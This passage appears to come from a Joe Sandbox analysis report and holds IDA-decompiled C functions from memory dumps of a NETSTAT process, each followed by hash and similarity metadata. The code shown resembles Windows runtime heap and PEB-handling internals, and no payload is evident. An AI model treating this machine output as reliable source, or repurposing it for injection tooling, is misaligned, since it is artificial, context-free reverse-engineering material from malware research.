                                      						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
                                      						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
                                      						_push( &_v184);
                                      						_push(_t59);
                                      						_push(_t57);
                                      						_push(0xa0);
                                      						_push(_t57);
                                      						_push(0xf);
                                      						_t42 = E02EAB0B0();
                                      						if(_t42 != 0xc0000023) {
                                      							break;
                                      						}
                                      						if(_v177 != 0) {
                                      							L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
                                      						}
                                      						_v177 = 1;
                                      						_t44 = L02E84620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
                                      						_t59 = _v184;
                                      						_t57 = _t44;
                                      						if(_t57 != 0) {
                                      							continue;
                                      						} else {
                                      							_t42 = 0xc0000017;
                                      							break;
                                      						}
                                      					}
                                      					if(_t42 != 0) {
                                      						_t65 = E02E6CCC0(_t42);
                                      						if(_t65 != 0) {
                                      							L10:
                                      							if(_v177 != 0) {
                                      								if(_t57 != 0) {
                                      									L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
                                      								}
                                      							}
                                      							_t46 = _t65;
                                      							L12:
                                      							return E02EAB640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
                                      						}
                                      						L7:
                                      						_t50 = _a4;
                                      						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
                                      						if(_t50 != 3) {
                                      							if(_t50 == 2) {
                                      								goto L8;
                                      							}
                                      							L9:
                                      							if(E02EAF380(_t67 + 0xc, 0x2e45138, 0x10) == 0) {
                                      								 *0x2f560d8 = _t67;
                                      							}
                                      							goto L10;
                                      						}
                                      						L8:
                                      						_t64 = _t57 + 0x28;
                                      						E02E94F49(_t67, _t57 + 0x28);
                                      						goto L9;
                                      					}
                                      					_t65 = 0;
                                      					goto L7;
                                      				}
                                      				if(E02E94E70(0x2f586b0, 0x2e95690, 0, 0) != 0) {
                                      					_t46 = E02E6CCC0(_t56);
                                      					goto L12;
                                      				} else {
                                      					_t59 = 0xa0;
                                      					goto L3;
                                      				}
                                      			}

                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true
                                      • Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp
                                      • Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7912cc16a616a77a94da86c5f7d9f8551b78adfb2f8d4c5f87d24f148c78cb52
                                      • Instruction ID: 2f31e55cb66dafaa982706346d43060ba1134ceee79d95fb3de73acfab692e20
                                      • Opcode Fuzzy Hash: 7912cc16a616a77a94da86c5f7d9f8551b78adfb2f8d4c5f87d24f148c78cb52
                                      • Instruction Fuzzy Hash: 8F41D475AC03189FEF21DF14CC80FABB7AAEB45718F04949AE9499B280D770DD45CB91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E02F2AA16(void* __ecx, intOrPtr __edx, signed int _a4, short _a8) {
                                      				intOrPtr _v8;
                                      				char _v12;
                                      				signed int _v16;
                                      				signed char _v20;
                                      				intOrPtr _v24;
                                      				char* _t37;
                                      				void* _t47;
                                      				signed char _t51;
                                      				void* _t53;
                                      				char _t55;
                                      				intOrPtr _t57;
                                      				signed char _t61;
                                      				intOrPtr _t75;
                                      				void* _t76;
                                      				signed int _t81;
                                      				intOrPtr _t82;
                                      
                                      				_t53 = __ecx;
                                      				_t55 = 0;
                                      				_v20 = _v20 & 0;
                                      				_t75 = __edx;
                                      				_t81 = ( *(__ecx + 0xc) | _a4) & 0x93000f0b;
                                      				_v24 = __edx;
                                      				_v12 = 0;
                                      				if((_t81 & 0x01000000) != 0) {
                                      					L5:
                                      					if(_a8 != 0) {
                                      						_t81 = _t81 | 0x00000008;
                                      					}
                                      					_t57 = E02F2ABF4(_t55 + _t75, _t81);
                                      					_v8 = _t57;
                                      					if(_t57 < _t75 || _t75 > 0x7fffffff) {
                                      						_t76 = 0;
                                      						_v16 = _v16 & 0;
                                      					} else {
                                      						_t59 = _t53;
                                      						_t76 = E02F2AB54(_t53, _t75, _t57, _t81 & 0x13000003,  &_v16);
                                      						if(_t76 != 0 && (_t81 & 0x30000f08) != 0) {
                                      							_t47 = E02F2AC78(_t53, _t76, _v24, _t59, _v12, _t81, _a8);
                                      							_t61 = _v20;
                                      							if(_t61 != 0) {
                                      								 *(_t47 + 2) =  *(_t47 + 2) ^ ( *(_t47 + 2) ^ _t61) & 0x0000000f;
                                      								if(E02F0CB1E(_t61, _t53, _t76, 2, _t47 + 8) < 0) {
                                      									L02E877F0(_t53, 0, _t76);
                                      									_t76 = 0;
                                      								}
                                      							}
                                      						}
                                      					}
                                      					_t82 = _v8;
                                      					L16:
                                      					if(E02E87D50() == 0) {
                                      						_t37 = 0x7ffe0380;
                                      					} else {
                                      						_t37 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                      					}
                                      					if( *_t37 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                                      						E02F2131B(_t53, _t76, _t82, _v16);
                                      					}
                                      					return _t76;
                                      				}
                                      				_t51 =  *(__ecx + 0x20);
                                      				_v20 = _t51;
                                      				if(_t51 == 0) {
                                      					goto L5;
                                      				}
                                      				_t81 = _t81 | 0x00000008;
                                      				if(E02F0CB1E(_t51, __ecx, 0, 1,  &_v12) >= 0) {
                                      					_t55 = _v12;
                                      					goto L5;
                                      				} else {
                                      					_t82 = 0;
                                      					_t76 = 0;
                                      					_v16 = _v16 & 0;
                                      					goto L16;
                                      				}
                                      			}

                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true
                                      • Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp
                                      • Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                                      • Instruction ID: 9ddc16aa6e2f139b750c139600f9d027e5c0e3328bf5794cf666213f953eb70c
                                      • Opcode Fuzzy Hash: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                                      • Instruction Fuzzy Hash: 46312432F00124ABDB158B69CC44BBFF7BBEF86390F058069EA04A7281DB70CD08CA50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 94%
                                      			E02E78A0A(intOrPtr* __ecx, signed int __edx) {
                                      				signed int _v8;
                                      				char _v524;
                                      				signed int _v528;
                                      				void* _v532;
                                      				char _v536;
                                      				char _v540;
                                      				char _v544;
                                      				intOrPtr* _v548;
                                      				void* __ebx;
                                      				void* __edi;
                                      				void* __esi;
                                      				signed int _t44;
                                      				void* _t46;
                                      				void* _t48;
                                      				signed int _t53;
                                      				signed int _t55;
                                      				intOrPtr* _t62;
                                      				void* _t63;
                                      				unsigned int _t75;
                                      				signed int _t79;
                                      				unsigned int _t81;
                                      				unsigned int _t83;
                                      				signed int _t84;
                                      				void* _t87;
                                      
                                      				_t76 = __edx;
                                      				_v8 =  *0x2f5d360 ^ _t84;
                                      				_v536 = 0x200;
                                      				_t79 = 0;
                                      				_v548 = __edx;
                                      				_v544 = 0;
                                      				_t62 = __ecx;
                                      				_v540 = 0;
                                      				_v532 =  &_v524;
                                      				if(__edx == 0 || __ecx == 0) {
                                      					L6:
                                      					return E02EAB640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
                                      				} else {
                                      					_v528 = 0;
                                      					E02E7E9C0(1, __ecx, 0, 0,  &_v528);
                                      					_t44 = _v528;
                                      					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
                                      					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
                                      					_t46 = 0xa;
                                      					_t87 = _t81 - _t46;
                                      					if(_t87 > 0 || _t87 == 0) {
                                      						 *_v548 = 0x2e41180;
                                      						L5:
                                      						_t79 = 1;
                                      						goto L6;
                                      					} else {
                                      						_t48 = E02E91DB5(_t62,  &_v532,  &_v536);
                                      						_t76 = _v528;
                                      						if(_t48 == 0) {
                                      							L9:
                                      							E02EA3C2A(_t81, _t76,  &_v544);
                                      							 *_v548 = _v544;
                                      							goto L5;
                                      						}
                                      						_t62 = _v532;
                                      						if(_t62 != 0) {
                                      							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
                                      							_t53 =  *_t62;
                                      							_v528 = _t53;
                                      							if(_t53 != 0) {
                                      								_t63 = _t62 + 4;
                                      								_t55 = _v528;
                                      								do {
                                      									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
                                      										if(E02E78999(_t63,  &_v540) == 0) {
                                      											_t55 = _v528;
                                      										} else {
                                      											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
                                      											_t55 = _v528;
                                      											if(_t75 >= _t83) {
                                      												_t83 = _t75;
                                      											}
                                      										}
                                      									}
                                      									_t63 = _t63 + 0x14;
                                      									_t55 = _t55 - 1;
                                      									_v528 = _t55;
                                      								} while (_t55 != 0);
                                      								_t62 = _v532;
                                      							}
                                      							if(_t62 !=  &_v524) {
                                      								L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
                                      							}
                                      							_t76 = _t83 & 0x0000ffff;
                                      							_t81 = _t83 >> 0x10;
                                      						}
                                      						goto L9;
                                      					}
                                      				}
                                      			}

                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true
                                      • Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp
                                      • Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6a282bd403d0d013e9cc1076d78cb0c3abcbbe0198f96709007022b22b0dd6b9
                                      • Instruction ID: 9f889c884ca76a0bfc9a2b383bb597dff033556956368ead541e350413dd4ba6
                                      • Opcode Fuzzy Hash: 6a282bd403d0d013e9cc1076d78cb0c3abcbbe0198f96709007022b22b0dd6b9
                                      • Instruction Fuzzy Hash: 7B4171B4A8022C9BDB64DF55C89CBE9B3B5EB54304F1095EAE81997241E7709E80DF60
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 76%
                                      			E02F2FDE2(signed int* __ecx, signed int __edx, signed int _a4) {
                                      				char _v8;
                                      				signed int _v12;
                                      				signed int _t29;
                                      				char* _t32;
                                      				char* _t43;
                                      				signed int _t80;
                                      				signed int* _t84;
                                      
                                      				_push(__ecx);
                                      				_push(__ecx);
                                      				_t56 = __edx;
                                      				_t84 = __ecx;
                                      				_t80 = E02F2FD4E(__ecx, __edx);
                                      				_v12 = _t80;
                                      				if(_t80 != 0) {
                                      					_t29 =  *__ecx & _t80;
                                      					_t74 = (_t80 - _t29 >> 4 << __ecx[1]) + _t29;
                                      					if(__edx <= (_t80 - _t29 >> 4 << __ecx[1]) + _t29) {
                                      						E02F30A13(__ecx, _t80, 0, _a4);
                                      						_t80 = 1;
                                      						if(E02E87D50() == 0) {
                                      							_t32 = 0x7ffe0380;
                                      						} else {
                                      							_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                      						}
                                      						if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                                      							_push(3);
                                      							L21:
                                      							E02F21608( *((intOrPtr*)(_t84 + 0x3c)), _t56);
                                      						}
                                      						goto L22;
                                      					}
                                      					if(( *(_t80 + 0xc) & 0x0000000c) != 8) {
                                      						_t80 = E02F32B28(__ecx[0xc], _t74, __edx, _a4,  &_v8);
                                      						if(_t80 != 0) {
                                      							_t66 =  *((intOrPtr*)(_t84 + 0x2c));
                                      							_t77 = _v8;
                                      							if(_v8 <=  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x2c)) + 0x28)) - 8) {
                                      								E02F2C8F7(_t66, _t77, 0);
                                      							}
                                      						}
                                      					} else {
                                      						_t80 = E02F2DBD2(__ecx[0xb], _t74, __edx, _a4);
                                      					}
                                      					if(E02E87D50() == 0) {
                                      						_t43 = 0x7ffe0380;
                                      					} else {
                                      						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                      					}
                                      					if( *_t43 == 0 || ( *( *[fs:0x30] + 0x240) & 0x00000001) == 0 || _t80 == 0) {
                                      						goto L22;
                                      					} else {
                                      						_push((0 | ( *(_v12 + 0xc) & 0x0000000c) != 0x00000008) + 2);
                                      						goto L21;
                                      					}
                                      				} else {
                                      					_push(__ecx);
                                      					_push(_t80);
                                      					E02F2A80D(__ecx[0xf], 9, __edx, _t80);
                                      					L22:
                                      					return _t80;
                                      				}
                                      			}











                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true
                                      • Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp
                                      • Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                                      • Instruction ID: ebba5da101bcfda492ea39f4d186d9317841d2a3e18da145257ec776858bbb58
                                      • Opcode Fuzzy Hash: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                                      • Instruction Fuzzy Hash: 7F311832710A506FD322D768CC44F6BB7B6EB87790F184258E64A8BB45DB74DC49CB10
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 70%
                                      			E02F2EA55(intOrPtr* __ecx, char __edx, signed int _a4) {
                                      				signed int _v8;
                                      				char _v12;
                                      				intOrPtr _v15;
                                      				char _v16;
                                      				intOrPtr _v19;
                                      				void* _v28;
                                      				intOrPtr _v36;
                                      				void* __ebx;
                                      				void* __edi;
                                      				signed char _t26;
                                      				signed int _t27;
                                      				char* _t40;
                                      				unsigned int* _t50;
                                      				intOrPtr* _t58;
                                      				unsigned int _t59;
                                      				char _t75;
                                      				signed int _t86;
                                      				intOrPtr _t88;
                                      				intOrPtr* _t91;
                                      
                                      				_t75 = __edx;
                                      				_t91 = __ecx;
                                      				_v12 = __edx;
                                      				_t50 = __ecx + 0x30;
                                      				_t86 = _a4 & 0x00000001;
                                      				if(_t86 == 0) {
                                      					E02E82280(_t26, _t50);
                                      					_t75 = _v16;
                                      				}
                                      				_t58 = _t91;
                                      				_t27 = E02F2E815(_t58, _t75);
                                      				_v8 = _t27;
                                      				if(_t27 != 0) {
                                      					E02E6F900(_t91 + 0x34, _t27);
                                      					if(_t86 == 0) {
                                      						E02E7FFB0(_t50, _t86, _t50);
                                      					}
                                      					_push( *((intOrPtr*)(_t91 + 4)));
                                      					_push( *_t91);
                                      					_t59 =  *(_v8 + 0x10);
                                      					_t53 = 1 << (_t59 >> 0x00000002 & 0x0000003f);
                                      					_push(0x8000);
                                      					_t11 = _t53 - 1; // 0x0
                                      					_t12 = _t53 - 1; // 0x0
                                      					_v16 = ((_t59 >> 0x00000001 & 1) + (_t59 >> 0xc) << 0xc) - 1 + (1 << (_t59 >> 0x00000002 & 0x0000003f)) - (_t11 + ((_t59 >> 0x00000001 & 1) + (_t59 >> 0x0000000c) << 0x0000000c) & _t12);
                                      					E02F2AFDE( &_v12,  &_v16);
                                      					asm("lock xadd [eax], ecx");
                                      					asm("lock xadd [eax], ecx");
                                      					E02F2BCD2(_v8,  *_t91,  *((intOrPtr*)(_t91 + 4)));
                                      					_t55 = _v36;
                                      					_t88 = _v36;
                                      					if(E02E87D50() == 0) {
                                      						_t40 = 0x7ffe0388;
                                      					} else {
                                      						_t55 = _v19;
                                      						_t40 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                      					}
                                      					if( *_t40 != 0) {
                                      						E02F1FE3F(_t55, _t91, _v15, _t55);
                                      					}
                                      				} else {
                                      					if(_t86 == 0) {
                                      						E02E7FFB0(_t50, _t86, _t50);
                                      						_t75 = _v16;
                                      					}
                                      					_push(_t58);
                                      					_t88 = 0;
                                      					_push(0);
                                      					E02F2A80D(_t91, 8, _t75, 0);
                                      				}
                                      				return _t88;
                                      			}























                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true
                                      • Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp
                                      • Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                                      • Instruction ID: 64bd5d5fc67499279fdd28fd3e45b95ebeb4f7a9fc01c70eeeb1ba61ac22428c
                                      • Opcode Fuzzy Hash: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                                      • Instruction Fuzzy Hash: 8F31A3726047159BC719DF24CC80A6BB7EAFBC1350F14892DF69687640EF30E819CB91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 69%
                                      			E02EE69A6(signed short* __ecx, void* __eflags) {
                                      				signed int _v8;
                                      				signed int _v16;
                                      				intOrPtr _v20;
                                      				signed int _v24;
                                      				signed short _v28;
                                      				signed int _v32;
                                      				intOrPtr _v36;
                                      				signed int _v40;
                                      				char* _v44;
                                      				signed int _v48;
                                      				intOrPtr _v52;
                                      				signed int _v56;
                                      				char _v60;
                                      				signed int _v64;
                                      				char _v68;
                                      				char _v72;
                                      				signed short* _v76;
                                      				signed int _v80;
                                      				char _v84;
                                      				void* __ebx;
                                      				void* __edi;
                                      				void* __esi;
                                      				void* _t68;
                                      				intOrPtr _t73;
                                      				signed short* _t74;
                                      				void* _t77;
                                      				void* _t78;
                                      				signed int _t79;
                                      				signed int _t80;
                                      
                                      				_v8 =  *0x2f5d360 ^ _t80;
                                      				_t75 = 0x100;
                                      				_v64 = _v64 & 0x00000000;
                                      				_v76 = __ecx;
                                      				_t79 = 0;
                                      				_t68 = 0;
                                      				_v72 = 1;
                                      				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
                                      				_t77 = 0;
                                      				if(L02E76C59(__ecx[2], 0x100, __eflags) != 0) {
                                      					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
                                      					if(_t79 != 0 && E02EE6BA3() != 0) {
                                      						_push(0);
                                      						_push(0);
                                      						_push(0);
                                      						_push(0x1f0003);
                                      						_push( &_v64);
                                      						if(E02EA9980() >= 0) {
                                      							E02E82280(_t56, 0x2f58778);
                                      							_t77 = 1;
                                      							_t68 = 1;
                                      							if( *0x2f58774 == 0) {
                                      								asm("cdq");
                                      								 *(_t79 + 0xf70) = _v64;
                                      								 *(_t79 + 0xf74) = 0x100;
                                      								_t75 = 0;
                                      								_t73 = 4;
                                      								_v60 =  &_v68;
                                      								_v52 = _t73;
                                      								_v36 = _t73;
                                      								_t74 = _v76;
                                      								_v44 =  &_v72;
                                      								 *0x2f58774 = 1;
                                      								_v56 = 0;
                                      								_v28 = _t74[2];
                                      								_v48 = 0;
                                      								_v20 = ( *_t74 & 0x0000ffff) + 2;
                                      								_v40 = 0;
                                      								_v32 = 0;
                                      								_v24 = 0;
                                      								_v16 = 0;
                                      								if(E02E6B6F0(0x2e4c338, 0x2e4c288, 3,  &_v60) == 0) {
                                      									_v80 = _v80 | 0xffffffff;
                                      									_push( &_v84);
                                      									_push(0);
                                      									_push(_v64);
                                      									_v84 = 0xfa0a1f00;
                                      									E02EA9520();
                                      								}
                                      							}
                                      						}
                                      					}
                                      				}
                                      				if(_v64 != 0) {
                                      					_push(_v64);
                                      					E02EA95D0();
                                      					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000;
                                      					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000;
                                      				}
                                      				if(_t77 != 0) {
                                      					E02E7FFB0(_t68, _t77, 0x2f58778);
                                      				}
                                      				_pop(_t78);
                                      				return E02EAB640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
                                      			}

































                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true
                                      • Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp
                                      • Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6e9c62aabb7083730e074392c2bf897880e41432ab89f9d7fb0da7efe2f26618
                                      • Instruction ID: 308cc4a63bcbc4c23506894f56b5a2dff600194c2150a3aabb970cbf0e1481d5
                                      • Opcode Fuzzy Hash: 6e9c62aabb7083730e074392c2bf897880e41432ab89f9d7fb0da7efe2f26618
                                      • Instruction Fuzzy Hash: 0A4179B1D80208AFDF14DFA5D940BEEBBF9EF48718F14912AE919A7240DB70A945CB50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 85%
                                      			E02E65210(intOrPtr _a4, void* _a8) {
                                      				void* __ecx;
                                      				intOrPtr _t31;
                                      				signed int _t32;
                                      				signed int _t33;
                                      				intOrPtr _t35;
                                      				signed int _t52;
                                      				void* _t54;
                                      				void* _t56;
                                      				unsigned int _t59;
                                      				signed int _t60;
                                      				void* _t61;
                                      
                                      				_t61 = E02E652A5(1);
                                      				if(_t61 == 0) {
                                      					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
                                      					_t54 =  *((intOrPtr*)(_t31 + 0x28));
                                      					_t59 =  *(_t31 + 0x24) & 0x0000ffff;
                                      				} else {
                                      					_t54 =  *((intOrPtr*)(_t61 + 0x10));
                                      					_t59 =  *(_t61 + 0xc) & 0x0000ffff;
                                      				}
                                      				_t60 = _t59 >> 1;
                                      				_t32 = 0x3a;
                                      				if(_t60 < 2 ||  *((intOrPtr*)(_t54 + _t60 * 2 - 4)) == _t32) {
                                      					_t52 = _t60 + _t60;
                                      					if(_a4 > _t52) {
                                      						goto L5;
                                      					}
                                      					if(_t61 != 0) {
                                      						asm("lock xadd [esi], eax");
                                      						if((_t32 | 0xffffffff) == 0) {
                                      							_push( *((intOrPtr*)(_t61 + 4)));
                                      							E02EA95D0();
                                      							L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
                                      						}
                                      					} else {
                                      						E02E7EB70(_t54, 0x2f579a0);
                                      					}
                                      					_t26 = _t52 + 2; // 0xddeeddf0
                                      					return _t26;
                                      				} else {
                                      					_t52 = _t60 + _t60;
                                      					if(_a4 < _t52) {
                                      						if(_t61 != 0) {
                                      							asm("lock xadd [esi], eax");
                                      							if((_t32 | 0xffffffff) == 0) {
                                      								_push( *((intOrPtr*)(_t61 + 4)));
                                      								E02EA95D0();
                                      								L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
                                      							}
                                      						} else {
                                      							E02E7EB70(_t54, 0x2f579a0);
                                      						}
                                      						return _t52;
                                      					}
                                      					L5:
                                      					_t33 = E02EAF3E0(_a8, _t54, _t52);
                                      					if(_t61 == 0) {
                                      						E02E7EB70(_t54, 0x2f579a0);
                                      					} else {
                                      						asm("lock xadd [esi], eax");
                                      						if((_t33 | 0xffffffff) == 0) {
                                      							_push( *((intOrPtr*)(_t61 + 4)));
                                      							E02EA95D0();
                                      							L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
                                      						}
                                      					}
                                      					_t35 = _a8;
                                      					if(_t60 <= 1) {
                                      						L9:
                                      						_t60 = _t60 - 1;
                                      						 *((short*)(_t52 + _t35 - 2)) = 0;
                                      						goto L10;
                                      					} else {
                                      						_t56 = 0x3a;
                                      						if( *((intOrPtr*)(_t35 + _t60 * 2 - 4)) == _t56) {
                                      							 *((short*)(_t52 + _t35)) = 0;
                                      							L10:
                                      							return _t60 + _t60;
                                      						}
                                      						goto L9;
                                      					}
                                      				}
                                      			}















                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true
                                      • Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp
                                      • Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd
                                      Similarity
                                      • Opcode ID: 4a5753d1382fdd27172163815b092afcd3e7ab8421a88c7ab4122509f2a3a9d3
                                      • Instruction ID: 1ab82bfeaf0e32859b117bf071ab261570a44949f9ddfb590f50b0c650cd61bb
                                      • Opcode Fuzzy Hash: 4a5753d1382fdd27172163815b092afcd3e7ab8421a88c7ab4122509f2a3a9d3
                                      • Instruction Fuzzy Hash: EB3118312C1610DBC721AB58CD55B767BB6FF017A4F61E61EF85A0B190DB31F801CA90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 78%
                                      			E02E9A61C(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                      				intOrPtr _t35;
                                      				intOrPtr _t39;
                                      				intOrPtr _t45;
                                      				intOrPtr* _t51;
                                      				intOrPtr* _t52;
                                      				intOrPtr* _t55;
                                      				signed int _t57;
                                      				intOrPtr* _t59;
                                      				intOrPtr _t68;
                                      				intOrPtr* _t77;
                                      				void* _t79;
                                      				signed int _t80;
                                      				intOrPtr _t81;
                                      				char* _t82;
                                      				void* _t83;
                                      
                                      				_push(0x24);
                                      				_push(0x2f40220);
                                      				E02EBD08C(__ebx, __edi, __esi);
                                      				 *((intOrPtr*)(_t83 - 0x30)) = __edx;
                                      				_t79 = __ecx;
                                      				_t35 =  *0x2f57b9c; // 0x0
                                      				_t55 = L02E84620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, 0x28);
                                      				 *((intOrPtr*)(_t83 - 0x24)) = _t55;
                                      				if(_t55 == 0) {
                                      					_t39 = 0xc0000017;
                                      					L11:
                                      					return E02EBD0D1(_t39);
                                      				}
                                      				_t68 = 0;
                                      				 *((intOrPtr*)(_t83 - 0x1c)) = 0;
                                      				 *(_t83 - 4) =  *(_t83 - 4) & 0;
                                      				_t7 = _t55 + 8; // 0x8
                                      				_t57 = 6;
                                      				memcpy(_t7, _t79, _t57 << 2);
                                      				_t80 = 0xfffffffe;
                                      				 *(_t83 - 4) = _t80;
                                      				if(0 < 0) {
                                      					L14:
                                      					_t81 =  *((intOrPtr*)(_t83 - 0x1c));
                                      					L20:
                                      					L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55);
                                      					_t39 = _t81;
                                      					goto L11;
                                      				}
                                      				if( *((intOrPtr*)(_t55 + 0xc)) <  *(_t55 + 8)) {
                                      					_t81 = 0xc000007b;
                                      					goto L20;
                                      				}
                                      				if( *((intOrPtr*)(_t83 + 0xc)) == 0) {
                                      					_t59 =  *((intOrPtr*)(_t83 + 8));
                                      					_t45 =  *_t59;
                                      					 *((intOrPtr*)(_t83 - 0x20)) = _t45;
                                      					 *_t59 = _t45 + 1;
                                      					L6:
                                      					 *(_t83 - 4) = 1;
                                      					 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x10)))) =  *((intOrPtr*)(_t83 - 0x20));
                                      					 *(_t83 - 4) = _t80;
                                      					if(_t68 < 0) {
                                      						_t82 =  *((intOrPtr*)(_t83 + 0xc));
                                      						if(_t82 == 0) {
                                      							goto L14;
                                      						}
                                      						asm("btr eax, ecx");
                                      						_t81 =  *((intOrPtr*)(_t83 - 0x1c));
                                      						if( *_t82 != 0) {
                                      							 *0x2f57b10 =  *0x2f57b10 - 8;
                                      						}
                                      						goto L20;
                                      					}
                                      					 *((intOrPtr*)(_t55 + 0x24)) =  *((intOrPtr*)(_t83 - 0x20));
                                      					 *((intOrPtr*)(_t55 + 0x20)) =  *((intOrPtr*)(_t83 - 0x30));
                                      					_t51 =  *0x2f5536c; // 0x3f3fc8
                                      					if( *_t51 != 0x2f55368) {
                                      						_push(3);
                                      						asm("int 0x29");
                                      						goto L14;
                                      					}
                                      					 *_t55 = 0x2f55368;
                                      					 *((intOrPtr*)(_t55 + 4)) = _t51;
                                      					 *_t51 = _t55;
                                      					 *0x2f5536c = _t55;
                                      					_t52 =  *((intOrPtr*)(_t83 + 0x10));
                                      					if(_t52 != 0) {
                                      						 *_t52 = _t55;
                                      					}
